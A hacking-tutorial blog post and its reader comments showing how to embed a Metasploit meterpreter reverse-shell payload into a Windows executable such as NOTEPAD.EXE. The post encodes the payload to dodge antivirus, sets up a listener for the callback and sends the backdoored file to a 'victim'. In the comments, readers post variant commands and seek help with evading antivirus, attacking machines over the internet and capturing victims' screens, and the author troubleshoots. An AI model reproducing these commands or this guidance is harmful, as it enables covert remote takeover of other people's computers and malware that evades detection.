Create EXE Backdoor Using Metasploit and Backtrack 5 in 4 simple steps
How to Create EXE Backdoor Using Metasploit and Backtrack 5 in 4 simple steps, have you imagine when you click and open your notepad application it contain backdoor or malicious codes? or when you start your windows o.s it also start explorer.exe services, but this explorer.exe containing backdoor or malicious codes? Actually embedding backdoor into EXE files isn’t something hard to do, but it’s very easy.. you can follow the tutorial below to prove that I’m true it’s easy :p LoL 
Requirement :
1. Metasploit Framework 3 (or Metasploit v2) 2. Linux OS(or you can use backtrack 5 that already include metasploit framework inside the Operating System)
Step By Step Create EXE Backdoor Using Metasploit and Backtrack 5:
1. First of all you should prepare your target EXE file. In this case I will use NOTEPAD.EXE.
2. Next, we use msfpayload to inject a meterpreter reverse payload into our executable(NOTEPAD.EXE) and encoded it 5 times(5 iterations) using shikata_ga_nai and save the backdoored file into Desktop(all code below is in one line).
root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.92 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/NOTEPAD.EXE -o /root/Desktop/NOTEPAD2.EXE
3. Because we selected reverse meterpreter payload, we need to setup the exploit handler to handle the connection back to our attacking machine. In this case attacker use IP address 192.168.8.92. Go to Metasploit console by typing msfconsole, and then run :
msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.8.92 LHOST => 192.168.8.92 msf exploit(handler) > set LPORT 443 LPORT => 443 msf exploit(handler) > exploit
Don’t forget to change LHOST with your own IP address and LPORT with your desired local port. 
4. The next step we can send our special NOTEPAD.EXE files to victim, as soon as they download and open it, there’s meterpreter shell on victim computer : 
PWNED You also can learn how to implement this method to attack over the internet, but please read my previous tutorial about the logic how to attack network outside LAN / Attack WAN. Hope it’s useful for you. any comment or correction?please drop your comment below
Incoming search terms:
- metasploit backdoor
- msfpayload windows/meterpreter/reverse_tcp
- backtrack 5 exploit windows 7
- msfpayload
- backdoor exe
- msfpayload windows meterpreter reverse_tcp
- msfencode tutorial
- how to create a backdoor
- inject msfencode replace exe
- backdoor metasploit
Written by Vishnu Valentino.
Founder of hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com
See all posts by v4L || Visit Website : http://www.vishnuvalentino.com
Popular Posts
74 Responsesto “Create EXE Backdoor Using Metasploit and Backtrack 5 in 4 simple steps”
Trackbacks/Pingbacks
- 5 Steps to Screen Capture Victim Screen Using Metasploit Meterpreter | Vishnu Valentino Hacking Tutorial, Tips and Trick - [...] Creating EXE Backdoor using Metasploit in 4 steps [...]
Leave a Reply
Links
Get Updates via Networkedblogs
i cannot make it…my result is look like this
root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/NOTEPAD.EXE -o /root/Desktop/NOTEPAD2.EXE
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
[-] x86/shikata_ga_nai failed: No such file or directory – /root/Desktop/NOTEPAD.EXE
[-] No encoders succeeded.
#Tarish
did you already put the original NOTEPAD.EXE in your desktop?
try notepad.exe instead of NOTEPAD.EXE
hello sir , iam umesh sharma from India
1. Sir i have read your all articles of metasploit backtrack5 with VMWARE Workstation about ethical hacking , to how to controll the outside network like my friend’s network having different local IP address and different public IP address , and i have gain lots of knowledge from these articles ,and i have also try this trick on my friend’s computers working with windows xp under the knowledge of my friends, I have already told my friends about this matter.
2. Now sir, i want to discuss my problems those i have faced during this operation and i hope sir you will solve my problems
3. i have used these codings for generating the payload.exe file
(i) msfpayload windows/meterpreter/reverse_tcp LHOST=”my public IP address” LPORT=4444 X > /root/payload.exe
(this generate payload.exe file in my root directory but showing virus which is detected by “kespersky, Avira, Avg, quick heal antiviruses and so many others ” )
(and then for connecting) i have used these parameters
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST ” my local ip address ”
set LPORT 4444
exploit
( its not working, i mean to say that when i have opened the payload.exe file in my friends computer, No sending stage comes and no meterpreter session opened ) i have used pendrive to copy the payload.exe file in the friends computer because there is a problem to send this file with Gmail, yahoo,facebook,e-buddy messenger and other sites because this file contain virus and i have also removed the installed antivirus of friends computer and off the firewall detection. I have also change the extension of file from .exe to another extension when sending this file using the internet sites but the result is same its not work and shows the virus)
(ii) msfpayload windows/meterpreter/reverse_tcp LHOST=”my public IP address” LPORT=4444 X > /root/payload.exe
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST ” my public ip address ”
set LPORT 4444
exploit
(show the same problem which is written above)
(iii) msfpayload windows/meterpreter/reverse_tcp LHOST=”my public IP address” LPORT=4444 R | \
>msfencode -e x86/shikata_ga_nai -c 5 -t exe | \
>msfencode -e x86/countdown -c 2 -t exe | \
>msfencode -e x86/shikata_ga_nai -c 5 -t exe | \
>msfencode -x /root/notepad.exe -e x86/call4_dword_xor -t exe -c 5 -o notepad2.exe
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST ” my local ip address ”
set LPORT 4444
exploit
(show the same problem which is written above)
(iv) msfpayload windows/meterpreter/reverse_tcp LHOST=”my public IP address” LPORT=4444 R | \
>msfencode -e x86/shikata_ga_nai -c 5 -t exe | \
>msfencode -e x86/countdown -c 2 -t exe | \
>msfencode -e x86/shikata_ga_nai -c 5 -t exe | \
>msfencode -x /root/notepad.exe -e x86/call4_dword_xor -t exe -c 5 -o notepad2.exe
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST ” my public ip address ”
set LPORT 4444
exploit
(show the same problem which is written above)
(v) msfpayload windows/meterpreter/reverse_tcp LHOST=”my public IP address” LPORT=4444 R | \
>msfencode -t exe -x /root/putty.exe -e x86/shikata_ga_nai -c 5 -o putty_backdoor.exe
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST ” my local ip address ”
set LPORT 4444
exploit
(show the same problem which is written above)
but when i work on local area network means on cafe, then its work but the problem of virus detection is same
Sir, my question is :
this procedure work on WAN or LAN?
the problem of virus detection can be removed or not?
If the problem of virus detection can remove, then please tell me how this problem can remove?
how this procedure work on WAN. I mean to say that how i can open meterpreter session on my PC when i open the payload.exe file on my friends network or friends PC having different public ip address?
(NOTE : During this operation my firewall also disabled)
#Umesh Kumar Sharma
Before you go to the WAN, you need to know the characteristic of network that “unmanageable” by you. This network usually set and configured by your ISP or internet provider. Most of internet service provider will flag packet that come to unknown port as malicious and they will dropped it down. You need to know what is the allowed port and what is not allowed port. That’s why in the example I put port 80 or 443 both for exploit or payload.
sir, thanks for reply
but sir the problem of virus detection is remains a problem ,sir please tell me how the virus from payload.exe file can be removed ?, I have used all the codings those u have given, but the problem of virus detection is remains a problem , sir please give the particular solution for this problem
#umesh
about virus detection is like unending story. Once you “only find” the exploit in internet, just wait for an hours or days, then antivirus company will shut it down. You can find many tutorials about how to create your own exploit.
thanks..now its working fine..
Can you explain how to hack a remote pc with metasploit or SET cause i never hack a remote pc although installing a backdoor my backtrack 5 machine wouldnot get any incoming connection from remote machine.i am using vmware workstation..please explain this matter..
waiting for your better tutorial…thanks..
#tarish
I wrote tons of that kind of content on my blog…. Tutorial section
can i open the victim computer again after i shutdown without sending him anything
#mehdi
You can view this tutorial http://www.hacking-tutorial.com/computer/5-steps-to-set-up-backdoor-after-successfully-compromising-target-using-backtrack-5/
Asswhole, fucking scams!!!!
THIS CONNECTS TO HIS IP!! AND THEN LET'S HIM ACCESS YOUR PC! I AM GONNA SCREW UP YOUR IP!! ASSWHOLE AND THIS SITE IS GOING DOWN!!!
^
above poster is so lame
on the other note, notepad2.exe just dies when i try to open it on victim(test) windows "program stopped working" do you know why?
#tester
maybe he just start learn about computer security 
Yep just ignore it
are you using Windows 7 as your victim? if so, maybe the win 7 DEP and ASLR prevent it from working. you can try in windows xp
hey i managed to exploit my xp computer! i want to try it on Win7 computer (x64)… is it possible? any help any idea plzz
#alpha
I haven’t try it on Win7 x64, but maybe it has different infrastructure with x86…
hey thanx for a quick reply!
have done it on win 7 32 bit (x86)? does it work on it or does it simply refuses to work on win7? what do you think about vista?
#alpha
No it can’t on Windows 7, it has DEP to prevent exploit execution..it works on Windows XP
i realized that session dies after victim closes our backdoor file in this case Notepad,
and victim's AV Norton360 shows an alert that this file is not safe to run,
any ways to solve those problems ?
and i couldnt use your provided code i'm facing no encoder found and blah blah errors with that
i use this which i found on some blogs:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=5610 R | /pentest/exploits/framework3/msfencode -t exe -x /root/Desktop/notepad.exe -k -o /root/Desktop/calc_backdoor.exe -e x86/shikata_ga_nai -c 5
Any Guids ? solutions ?
oh i forget, thanks in advance
Awesome blog and articles mate , keep it up
When the exploit is ran it displays “Handler failed to bind to (ip address)”. Why is that?
-DeusIgni
Also, when flashdrive containing NOTEPAD2.EXE is opened on target, the system deletes it due to the fact that is has been found as a trojan virus. Is there anyway possible to overcome this without turning off the antivirus or having the target download the file? -DeusIgni
#Deuslgni
Yep that’s true it’s detected by antivirus…but my purpose here was the logic about how to create a backdoor…
Which was very astute tutorial, thank you for that.
-DeusIgni
this is my problem:
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
[-] x86/shikata_ga_nai failed: Offset 0 outside of image source
[-] No encoders succeeded.
what is means by offset 0 outside of image source?
Hi. I want to encode virus.exe. When I use msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/virus.exe -o /root/Desktop/virus2.exe - it didn't work. I don't get encrypted file. Can you help me?
#alex
did the iteration already finished?or has some error message?the file should be placed on your desktop.
Hi.
after i double click the file notepad2.exe on win xp, it doesn’t have any respond.
below is the console message
———————————–
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.77.128:443
[*] Starting the payload handler…
————————————-
what should i do? i using vmware workstation open bt5 and win xp.
#xuan
did you already set up your lhost to BT ip address?
did you have any firewall/windows firewall on your XP machine?
antivirus can find my backdoor why??????
#love bt
sure of course they will find it, you need learn how to hide it.
FYI : Your AV database was updated automatically almost every 2 days. so you need to think for new method + possibility
Is hikata_ga_nai the best encode to use, I have heard that avoid_utf8_tolower might be a bit better?
#jbone
actually encoding purpose is hide the backdoor from AV; but nowadays they’re smart to identify malicious file with their specific algorithms, so to find which one better, maybe you can check is it detected by AV or not.
hi v4L and thanks for this tutorial it’s very useful
I have a question :
what i need to execute this payload from remote pc not in my network (like RAT )
I tried this :
I Forwarded the port 443 in my router and set for 192.168.1.4 ( my backtrack pc )
and in the LHOST set to my STATIC IP(212.61.*.*)
and execute it from remote pc (it’s ip is 78.93.*.* )
but metasploit get not bind
when i set LHOST =192.168.1.4
it’s bind 192.168.1.4:443
but it stay looooong and no any sessions opened
please help me
is this way in correct
thanks
#adigapro
when you set the LHOST with your public IP and it forward the port 443 packet to your local network, did your BT receive something?if it receive some interaction, then it’s already connected
how can i hack traget with wan ip
#mouh
see this post : http://www.hacking-tutorial.com/hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/
Dude dont be so rude when someone ask for help cause aint createing it , if anyone just sees this tutorial remember IoXx told you how
this makes it and encodes it .
msfpayload windows/meterpreter/reverse_tcp lhost=x.x.189.146 LPORT=443 X > /root/Desktop/NOTEPAD.EXE R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/NOTEPAD.EXE -o /root/Desktop/NOTEPAD2.EXE
and makes it remote
by the way i aint stupid, i put a random ip there for a example
#loxx
only a stupid guy tell others “I’m a good guy” when there’s no one asking you 
LoL
Maybe your neighbours in Windermere can teach you not to do a st*pid things
this is my problem as well:
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
[-] x86/shikata_ga_nai failed: Offset 0 outside of image source
[-] No encoders succeeded.
The error is: offset 0 outside of image source
How do I fix??
Thanks
#cybersho
Have no idea, maybe others’ here?
hi sir, please tell me, is that any way to create session with windows7 without open file.exe in windows7
#irfan
you can look other tutorial here : http://www.hacking-tutorial.com/category/hacking-tutorial/
i could not found any suitable tutorial in this article. please give me any other guideline about windows7 hack, without open file.exe which maked by any trojan. i want session hijack with windows7.
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
[-] x86/shikata_ga_nai failed: No such file or directory – /root/Desktop/notepad.exe
[-] No encoders succeeded.
…….now what???i am on backtrack 5 r2….
thank you any way….solved it
which ip should i use to try to connect to my virtual machine ?
i did ifconfig -a and i got vmnet8 inet addr as 192.168.131.1. but when i tried to use it, i didn’t get a connection.
#nick
you need to use bridge connection for your Virtual machine
Can i get screen shot from victim pc and get pass words from vistims pc
#shakil
yes, http://www.hacking-tutorial.com/tips-and-trick/5-steps-to-screen-capture-victim-screen-using-metasploit-meterpreter/
Hi buddy,
First i want to thank you for the help you have provided on your website about metasploit. It has helped me a lot
I have tried all the encoders multiple times in different ways. Most of anti-virus are able to detect the payload.
Do you know to encrypt the payload and then decrypt it so that the anti-vir is unable to read the encrypted payload.
Thanks in advance.
Hello, i have created two blankfiles on the desktop notepad.exe and notepad2.exe when i encode them i get the following error
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.92 LPORT=443 R | msfencode -t exe -x Desktop/notepad.exe -k -o Desktop/notepad2.exe -c x86shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
[-] x86/shikata_ga_nai failed: Offset 0 outside of image source
[*] php/base64 succeeded with size 526 (iteration=1)
[*] php/base64 succeeded with size 724 (iteration=2)
[*] php/base64 succeeded with size 989 (iteration=3)
[*] php/base64 succeeded with size 1342 (iteration=4)
[*] php/base64 succeeded with size 1813 (iteration=5)
[-] php/base64 failed: Offset 0 outside of image source
[*] cmd/generic_sh succeeded with size 290 (iteration=1)
[*] cmd/generic_sh succeeded with size 290 (iteration=2)
[*] cmd/generic_sh succeeded with size 290 (iteration=3)
[*] cmd/generic_sh succeeded with size 290 (iteration=4)
[*] cmd/generic_sh succeeded with size 290 (iteration=5)
[-] cmd/generic_sh failed: Offset 0 outside of image source
[*] sparc/longxor_tag succeeded with size 344 (iteration=1)
[*] sparc/longxor_tag succeeded with size 396 (iteration=2)
[*] sparc/longxor_tag succeeded with size 448 (iteration=3)
[*] sparc/longxor_tag succeeded with size 500 (iteration=4)
[*] sparc/longxor_tag succeeded with size 552 (iteration=5)
[-] sparc/longxor_tag failed: Offset 0 outside of image source
[-] mipsbe/longxor failed: wrong constant name #
[-] mipsle/longxor failed: wrong constant name #
[*] x86/fnstenv_mov succeeded with size 314 (iteration=1)
[*] x86/fnstenv_mov succeeded with size 338 (iteration=2)
[*] x86/fnstenv_mov succeeded with size 362 (iteration=3)
[*] x86/fnstenv_mov succeeded with size 386 (iteration=4)
[*] x86/fnstenv_mov succeeded with size 410 (iteration=5)
[-] x86/fnstenv_mov failed: Offset 0 outside of image source
[*] ppc/longxor succeeded with size 368 (iteration=1)
[*] ppc/longxor succeeded with size 444 (iteration=2)
[*] ppc/longxor succeeded with size 520 (iteration=3)
[*] ppc/longxor succeeded with size 596 (iteration=4)
[*] ppc/longxor succeeded with size 672 (iteration=5)
[-] ppc/longxor failed: Offset 0 outside of image source
[*] ppc/longxor_tag succeeded with size 364 (iteration=1)
[*] ppc/longxor_tag succeeded with size 436 (iteration=2)
[*] ppc/longxor_tag succeeded with size 508 (iteration=3)
[*] ppc/longxor_tag succeeded with size 580 (iteration=4)
[*] ppc/longxor_tag succeeded with size 652 (iteration=5)
[-] ppc/longxor_tag failed: Offset 0 outside of image source
[*] generic/none succeeded with size 290 (iteration=1)
[*] generic/none succeeded with size 290 (iteration=2)
[*] generic/none succeeded with size 290 (iteration=3)
[*] generic/none succeeded with size 290 (iteration=4)
[*] generic/none succeeded with size 290 (iteration=5)
[-] generic/none failed: Offset 0 outside of image source
[*] x64/xor succeeded with size 335 (iteration=1)
[*] x64/xor succeeded with size 375 (iteration=2)
[*] x64/xor succeeded with size 415 (iteration=3)
[*] x64/xor succeeded with size 455 (iteration=4)
[*] x64/xor succeeded with size 495 (iteration=5)
[-] x64/xor failed: Offset 0 outside of image source
[*] x86/call4_dword_xor succeeded with size 316 (iteration=1)
[*] x86/call4_dword_xor succeeded with size 340 (iteration=2)
[*] x86/call4_dword_xor succeeded with size 364 (iteration=3)
[*] x86/call4_dword_xor succeeded with size 388 (iteration=4)
[*] x86/call4_dword_xor succeeded with size 412 (iteration=5)
[-] x86/call4_dword_xor failed: Offset 0 outside of image source
[*] x86/jmp_call_additive succeeded with size 321 (iteration=1)
[*] x86/jmp_call_additive succeeded with size 353 (iteration=2)
[*] x86/jmp_call_additive succeeded with size 385 (iteration=3)
[*] x86/jmp_call_additive succeeded with size 417 (iteration=4)
[*] x86/jmp_call_additive succeeded with size 449 (iteration=5)
[-] x86/jmp_call_additive failed: Offset 0 outside of image source
[*] x86/countdown succeeded with size 308 (iteration=1)
[*] x86/countdown succeeded with size 326 (iteration=2)
[*] x86/countdown succeeded with size 344 (iteration=3)
[*] x86/countdown succeeded with size 362 (iteration=4)
[*] x86/countdown succeeded with size 380 (iteration=5)
[-] x86/countdown failed: Offset 0 outside of image source
[*] x86/nonalpha succeeded with size 410 (iteration=1)
[-] x86/nonalpha failed: BadChar
[-] x86/nonupper failed: Encoding failed due to a nil character
[*] x86/alpha_upper succeeded with size 649 (iteration=1)
[*] x86/alpha_upper succeeded with size 1367 (iteration=2)
[*] x86/alpha_upper succeeded with size 2802 (iteration=3)
[*] x86/alpha_upper succeeded with size 5673 (iteration=4)
[*] x86/alpha_upper succeeded with size 11414 (iteration=5)
[-] x86/alpha_upper failed: Offset 0 outside of image source
[*] cmd/ifs succeeded with size 325 (iteration=1)
[*] cmd/ifs succeeded with size 325 (iteration=2)
[*] cmd/ifs succeeded with size 325 (iteration=3)
[*] cmd/ifs succeeded with size 325 (iteration=4)
[*] cmd/ifs succeeded with size 325 (iteration=5)
[-] cmd/ifs failed: Offset 0 outside of image source
[*] x86/alpha_mixed succeeded with size 641 (iteration=1)
[*] x86/alpha_mixed succeeded with size 1344 (iteration=2)
[*] x86/alpha_mixed succeeded with size 2749 (iteration=3)
[*] x86/alpha_mixed succeeded with size 5559 (iteration=4)
[*] x86/alpha_mixed succeeded with size 11179 (iteration=5)
[-] x86/alpha_mixed failed: Offset 0 outside of image source
/opt/metasploit/msf3/modules/encoders/x86/avoid_utf8_tolower.rb:146:in `decoder_stub’: The payload being encoded is of an incompatible size (73 bytes) from /opt/metasploit/msf3/lib/msf/core/encoder.rb:287:in `do_encode’
from /opt/metasploit/msf3/lib/msf/core/encoder.rb:271:in `encode’
from /opt/metasploit/msf3/msfencode:250:in `block (2 levels) in ‘
from /opt/metasploit/msf3/msfencode:247:in `upto’
from /opt/metasploit/msf3/msfencode:247:in `block in ‘
from /opt/metasploit/msf3/msfencode:237:in `each’
from /opt/metasploit/msf3/msfencode:237:in `’
Any help?
thanks
#rhys
try remove your -k in your command
Thanks for the quick reply but no luck, i dont know whats wrong, although is it acceptable to put on the desktop 2 blank files (right click > create blank file) and to rename one to notepad.exe and the other to notepad2.exe
#rhys
no you can’t, or maybe you can try update your metasploit framework (run
msfupdate).still no luck, what two exe files should i create on the desktop. thanks
What two files should be put on the desktop and where should I get them from. Also the update made no change. Just some more information I am running backtrack 5r3 gnome 64bit installed to the hard drive.
#rhys
ah you use 64bit, try to change the x86 to x64shikata_ga_nai
Sorry, no luck, what files should i put on the desktop? you have used notepad.exe and a notepad2.exe but where do you get these files and what is the criteria for choosing these files? thank you for persevering i really appreciate it.
#rhys
it’s notepad.exe i got from c:\windows\system32, when i try another exe i still can encode it without error. :/?
Solved it, had to set it to do the following to it. allow executing file as a program. removing -k and setting it to x64, the program i used was notepadd++ from http://notepad-plus-plus.org/download/v6.3.html and taada. you sir have a regular follower,
thank you
when i exploit the payload like that the message shows like that
exploit
started reverse handler ip:lport
started payload handler
killed
after this message my process stops,
is this the problem of network connection ?
is this the problem of firewall on?
but should be noted that my network and victim network is ok and my firewall is off.
if there is any other suggestion then please give me thank u
payload.exe file is still detected by antivirus after using all the codings
i have also work on windows files like ” clbcatq.dll” and ” wuauclt.exe” but it is (payload.exe) still detected by antivirus
i have also make my own exploit bt problem is still problem
give ur suggestion
the problem of virus detection is not removed
i have also remove the unwanted characters/bad char/null bites ‘\x00\xff\xa1′ something like that from payload.exe file , bt it is still detected by antivirus
how this problem can be removed
#umesh
I’ve already said to you on my last comment.
“create your own exploit”…if you download or use exploit from internet(the free one) or from metasploit(free) the probability detected by antivirus is 99% and 1% success is for zeroday.
if you want an instant one you can buy the exploit in 1337day.com
there is no any permanent way to remove this virus by the use of encoders, if the encoders are not working then why these encoders are given in the metasploit
#umesh
that’s why we need to learn
let say you’re a good people, can you think how much bad people out there that also use this encoder?
you got the tutorial how to hide exploit from antivirus from the internet, do you think the antivirus company they will just sit down and relax without upgrading their system while they read the same tutorial?
be realistic
that’s why I noted in my last comment, if you want the instant one, then you can buy it without do the research.
hi this was in regards to the injecting a exe into a custom PE like notepad.exe. Problem faced is when we create an exe and inject it in notepad.exe using -k option and try opening it in the windows platform the blank notepad opens up and then the shell code is executed. Now i want to know that is there a way where in the shell code can be executed without the notepad opening up.
i have also removed the bad charasters or null characters ‘\x00\xff\xa1′ like that by using the various encoders but the problem of virus detection is remains a problem. i have also worked on ‘clbcatq.dll’and ‘wuauclt.exe’ windows files but the problem of virus detection is remains a problem
how the virus can be removed
i think virus cannot be removed because backtrack or linux is a backdoor testing machine not for virus removal
if u have any other suggestion please give
vishnu i would like you to please help me out in reagrds to the problem i posted in my earlier post. your help will be highly solicitated
Nice blog post but now this backdoor is detected ;[.
I found another video about backdoor hope you like it. There are lots of videos but i only interested in creating a backdoors. Have a look if you like this video http://goo.gl/XlwJX
#Abhijith
Thanks for sharing
when i exploit the payload the message shows like that
exploit
started reverse handler ip:lport
started payload handler
killed
after this message “killed” my process stops,
is this the problem of network connection ?
is this the problem of firewall on?
but should be noted that my network and victim network is ok and my firewall is off.
if there is any other suggestion then please give me thank u
Hello, i am getting this error. Could you please help as it would be much appreciated.
Thank You
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.254 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/NOTEPAD.EXE -o /root/Desktop/NOTEPAD2.EXE
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
[-] x86/shikata_ga_nai failed: Offset 0 outside of image source
[-] No encoders succeeded.